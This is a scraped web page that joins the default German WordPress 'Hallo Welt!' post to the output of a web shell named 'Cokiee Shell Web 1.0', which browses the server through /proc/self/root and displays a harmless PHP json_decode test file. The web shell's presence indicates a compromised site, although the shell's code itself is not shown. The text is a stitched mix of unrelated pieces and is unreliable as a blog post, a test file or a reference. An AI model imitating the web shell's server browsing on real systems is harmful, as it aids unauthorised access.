Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/json/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/json/tests/bug73991.phpt |
--TEST-- Allow JSON_OBJECT_AS_ARRAY to have an effect --FILE-- <?php $json = '{"foo":"bar"}'; var_dump(json_decode($json, false)); var_dump(json_decode($json, true)); var_dump(json_decode($json, null, 512, 0)); var_dump(json_decode($json, null, 512, JSON_OBJECT_AS_ARRAY)); --EXPECTF-- object(stdClass)#%d (1) { ["foo"]=> string(3) "bar" } array(1) { ["foo"]=> string(3) "bar" } object(stdClass)#%d (1) { ["foo"]=> string(3) "bar" } array(1) { ["foo"]=> string(3) "bar" }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare